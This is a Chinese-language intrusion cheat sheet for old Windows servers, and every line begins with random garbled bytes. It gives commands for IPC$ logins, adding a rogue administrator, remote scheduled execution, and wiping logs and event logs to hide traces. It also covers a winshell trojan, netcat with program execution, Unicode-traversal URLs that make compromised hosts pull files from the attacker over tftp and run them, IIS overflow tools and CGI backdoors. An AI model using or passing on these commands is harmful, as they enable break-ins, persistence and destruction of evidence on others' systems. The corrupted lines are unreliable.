网管和黑客都必须知道的命令
0��� oHnam 常用的几条NET命令:
�$��C6O<�A 6X��GqZ!�2 (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
`"���j�_]� Iy�{&T#e�" (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
(t-JG�ye>� eX�{Tyd�{� (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
@{8S�C~�ha Qx[�
�n�R/ (查看远程主机时间) net time \\IP地址
C�.�{z��+� ]WC@*3'kye (定时启动某个程序) at \\IP地址 02:18 readme.exe
�j�;i7.B"[ 0'^zI�L#.� (查看共享) net view \\IP地址
V?Ye^��-29 }9(�:W�</} (查看netbios工作组列表) nbtstat -A IP地址
a(eUd�G�J �hj�Y)W��; (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
ZCCwx7�1�j FtxmCIVIV~ (这两条把自己增加到管理员组): net user 用户名 密码 /add
jX{t/8v/s4 � .tRWL!� net localgroup Administrators 用户名 /add
JUC6�2s#_z {K+]^��M�� (断开连接) net use \\IP地址\ipc$ /delete
$5#+�;A'Q+ �M�IWI0bnf 扫尾:
cv�Q��MZ,p dK?v��g@|' del C:\winnt\system32\logfiles\*.*
4krK CD>|G ��o�_ �SR� del C:\winnt\ssytem32\config\*.evt
qi-!i�T(fe t���0gLz
J del C:\winnt\system32\dtclog\*.*
5�oE!^�bF? POc-`]6�<F del C:\winnt\system32\*.log
Q���:!.YSB ��-�OV!56& del C:\winnt\system32\*.txt
hKY���A�5] lzStJ,NPqn del C:\winnt\*.txt
rz3!0P�!"K 1��t7S:I�Z del C:\winnt\*.log
?3:xR_VWZu [�1��gWc`# 一、netsvc.exe
S,��TK;g�� &��+V|L�dh 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
/��I3���>u kkE1��CH�Y netsvc /list \\IP地址
7tr;adj�s� ��Z'L}�x�6 netsvc schedule \\IP地址 /query
Y�;WHjW(�K y��%��x2� netsvc \\IP地址 schedule /start
^3 �
'7 F;^GhiQ�VS 二、OpenTelnet.exe
W�o+'j� $k �5�//.q;�z 远程启动主机的Telnet服务,并绑定端口到7878,例如:
SB'��$?Kh� X"qC&oZmf OpenTelnet \\IP地址 用户名 密码 1 7878
:Tz�HI ��� �VX�tW{*{" 然后就可以telnet到主机的7878端口,进入DOS方式下:
C~d�D'�Tq] IT_Fs|�$�� telnet IP地址 7878
����5%n��� ��@SV.�F� 三、winshell.exe
i0-zG�EMB. ���8_@#5�� 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
�hE"�a�(�i S�MdQ,n1]� p Path (查看winshell主程序的路径信息)
a��m�K.H�" �b:uMO�N,H b reBoot (重新启动机器)
_A�%8oY�S L0�H��kmaH d shutDown (关闭机器)
N\OeWjA� F �s'/� g:aJ s Shell (执行后你就会看到可爱的“C:\>”)
�}�+8��w [�E�E�Tx-� x eXit (退出本次登录会话,此命令并不终止winshell的运行)
A12���#v�, I?mU�_^�no CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
{�]w�@s7E� s�A� u ;�i 四、3389登陆器,GUI方式登录远程主机的
Vg�)]�F+�E o�vn)�lIs� 五、elsave.exe
�3t�lA!��e �."m2�/Ks7 事件日志清除工具
�h��w� [G� "`AIU}[_I� elsave -s \\IP地址 -l "application" -C
��U�l�N�+� �'��8 ��~E elsave -s \\IP地址 -l "system" -C
71?>~PnbH} �<ZV� !fn elsave -s \\IP地址 -l "security" -C
�s�i�nnH�Q \)pT+��QxZ 执行后成功清除应用程序日志,系统日志,安全日志
(Wu_RXfCw_ Q!<b"��8V] 六、hbulot.exe
qU�Y QN2wG p Rn �vd|� 开启win2kserver和winxp的3389服务
pZ,�P��_�? W:^\Oe�5&a hbulot [/r]
PK�hH0O\_U jz_\B(m9%� 使用/r表示安装完成后自动重起目标使设置生效。
����m�G!Rh $DOBC@xxzT 七、nc.exe(netcat.exe)
b{Kpfb�xcI �9oL/oL-J/ 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
(@H��'7�,� )h0�F'MzW� 想要连接到某处: nc [-options] hostname port[s] [ports] ...
*LbRL��wt I�h]'OaE � 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
8uR4Z��E*� `���eat7O� 参数:
�bt/u�^E� }�-:s�9Lt -e prog 程序重定向,一旦连接,就执行 [危险!!]
��`)�[�bu� tU02�t�#8 -g gateway source-routing hop point[s], up to 8
!d�Vth)�UV I�G1+_�-H: -G num source-routing pointer: 4, 8, 12, ...
!�`yg bI.� '�{:�WxGgi -h 帮助信息
:6 ?����&L �4%TY�`
II -i secs 延时的间隔
f�CL�5E�t ��&xl�z80% -l 监听模式,用于入站连接
*OT�6)]|�k -o��\r]24� -n 指定数字的IP地址,不能用hostname
�
2L~[dn.s .FS�`F�h; -o file 记录16进制的传输
vt3��yC�S� �_
Fc�fNF� -p port 本地端口号
��{"dU�?/d X#�$mBRK7� -r 任意指定本地及远程端口
�,nJ�YYM
� C%8�jWc�� -s addr 本地源地址
?\�C7�.�of �#TLqo��(/ -u UDP模式
C<��GS._V& 821@q�r|`e -v 详细输出——用两个-v可得到更详细的内容
�mJa�Wz�R� �`�gIlS^�Q -w secs timeout的时间
M�~�Yh�o". "Ldi<xq%xl -z 将输入输出关掉——用于扫描时
�Jb'�M/�iG 八、TFTPD32.EXE
`CP�}1W��> [.O�3z*[9# 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
_h4{S���x� 1���k2+eI� http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
:?VM1�!~ga E�4^zW_|xE 然后可以直接令文件运行:
oe�$�Y=`� g|r�:+%,�M http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
N��b2]}; O ssv�4#8p3 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
f)p� c�$~B =I�H z@�CU 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
��!xm8�7�I M�XW�CY�i� 一、一 Xscan命令行运行参数说明:
;Jex#+H(:D ��o�7N3:�) 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
J�;�pn5k~3 Tt�i]H9�g_ 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
N'�nI
^=�� =FkU:��q�$ xscan -file <主机列表文件名> <检测项目> [其他选项]
$*ujX,}�xG v�Dg�f�}�� 其中<检测项目> 含义如下:
�:^+� aJ�] &[*F�!=�%8 -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
���tkBp?Wl �LHjGl��By -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
Y�4]USU!PA zm�H�8�#�� -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
kK�]J���N� /xm�Uu0H$R -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
<Q�Gf9{��m O�mkl|l9�� -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
wV- kB4^4� &Bn�K[�Q8X [其他选项] 含义如下:
F�.�)b`:g� x�4jn45]x@ -v: 显示详细扫描进度
#F\}PCBe'� u?[d�y
�n� -p: 跳过Ping不通的主机
+��5�Yf9� T�!.6@g`x> -o: 跳过没有检测到开放端口的主机
%/17�K2�g� �"�>QNiR�! -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
